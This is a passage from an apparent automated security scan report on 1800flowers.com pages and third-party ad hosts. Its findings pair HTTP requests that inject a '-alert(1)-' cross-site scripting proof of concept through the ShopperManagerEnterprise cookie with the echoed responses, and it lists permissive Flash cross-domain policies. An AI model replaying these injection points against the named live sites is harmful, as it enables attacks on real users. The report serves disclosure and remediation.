Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e6186159f'-alert(1)-'cdaf5668b0f8fa9a7; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:27:55 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00008a8prhUh8SalRi2w6rkI-n_:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 41351


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e6186159f'-alert(1)-'cdaf5668b0f8fa9a7');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...
4.208. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8d5d'-alert(1)-'e0b56c90518 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /product.do?baseCode=91637&dataset=10305&cm_cid=d10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a8d5d'-alert(1)-'e0b56c90518; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000uX3-gHyeEcHw9aTrUn6TXJ9:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.3.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|3|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902894375&t2=1304902899114&t3=1304902906957&t4=1304902893038&lti=1304902906957&ln=&hr=/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&fti=&fn=searchform%3A0%3BguidedCollectionForm%3A1%3BsortForm%3A2%3BUNDEFINED%3A3%3B&ac=&fd=&uer=&fu=&pi=d10305-Collection%20Page%20-%20Spring&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:25 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000a_guHrmpfTHmaqhCaGjZetU:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 89668


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618a8d5d'-alert(1)-'e0b56c90518');

lpAddVars('page','pageid','product');

//-->
...[SNIP]...
4.209. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40f86'-alert(1)-'ae4bf6d39bd71bd03 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do?actionEvent=shipping&cartItem%280%29.type=0&cartItem%280%29.itemId=5687d050-633d-4bcd-8079-f1cfa4a09ce8&cartItem%280%29.groupId=0&cartItem%280%29.flexOption=&cartItem%280%29.zip=10010&cartItem%280%29.international=false&cartItem%280%29.deliveryMonth=5&cartItem%280%29.deliveryDay=19&cartItem%280%29.deliveryYear=2011&cartItem%280%29.deliveryDate=Thursday%2C+May+19%2C+2011&cartItem%280%29.quantity=1&groupSize=1&cartItemsCount=1 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e61840f86'-alert(1)-'ae4bf6d39bd71bd03; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:34:08 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000drS1hk_yXE1LfymOJHvFSKB:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 41351


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e61840f86'-alert(1)-'ae4bf6d39bd71bd03');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...
4.210. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f63bb'-alert(1)-'8f0589d6161 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618f63bb'-alert(1)-'8f0589d6161; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:15 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 41340


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618f63bb'-alert(1)-'8f0589d6161');

lpAddVars('page','pageid','shoppingbasket');

//-->
...[SNIP]...
4.211. https://ww30.1800flowers.com/checkoutsignin.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3dc51'-alert(1)-'11e19fe15ec was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e6183dc51'-alert(1)-'11e19fe15ec; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902969048&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:39 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000z8k7FDy-3yn5v2TjyeJwm6H:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19854


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e6183dc51'-alert(1)-'11e19fe15ec');

lpAddVars('page','pageid','checkoutsignin');

lpAddVars('page','ConversionStage','1-signin');

//-->
...[SNIP]...
4.212. https://ww30.1800flowers.com/continueasguest.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /continueasguest.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faeda'-alert(1)-'77ac67bb4e716afa5 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /continueasguest.do?x=74&y=15 HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: https://ww30.1800flowers.com/checkoutsignin.do
Cache-Control: max-age=0
Origin: https://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618faeda'-alert(1)-'77ac67bb4e716afa5; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:23:08 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 56035


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
<meta
...[SNIP]...
<!--

lpAddVars('visitor','VisitorID','aed35ad7-54a3-48bc-a8e0-0c9f3d76e618faeda'-alert(1)-'77ac67bb4e716afa5');

lpAddVars('page','pageid','findgift');

lpAddVars('page','ERR01','Zip Code is invalid.');

lpAddVars('page','ErrorCounter','1');

//-->
...[SNIP]...
5. Flash cross-domain policy  previous  next
There are 24 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 09 May 2011 01:09:32 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.2. http://ads.undertone.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "3998220-fc-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 252
Content-Type: text/xml
Date: Mon, 09 May 2011 01:09:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
5.3. http://adsfac.us/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "0291dc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 00:59:32 GMT
Connection: close
Content-Length: 125

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>

5.4. http://at.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Mon, 09 May 2011 07:01:12 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...
5.5. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 01:18:23 GMT
Date: Mon, 09 May 2011 01:18:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
5.6. http://blooms.1800flowers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blooms.1800flowers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: blooms.1800flowers.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:51 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "2b35ca-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=991
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.7. http://bp.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 09 May 2011 01:01:04 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
5.8. http://data.cmcore.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.cmcore.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:57 GMT
Server: Apache
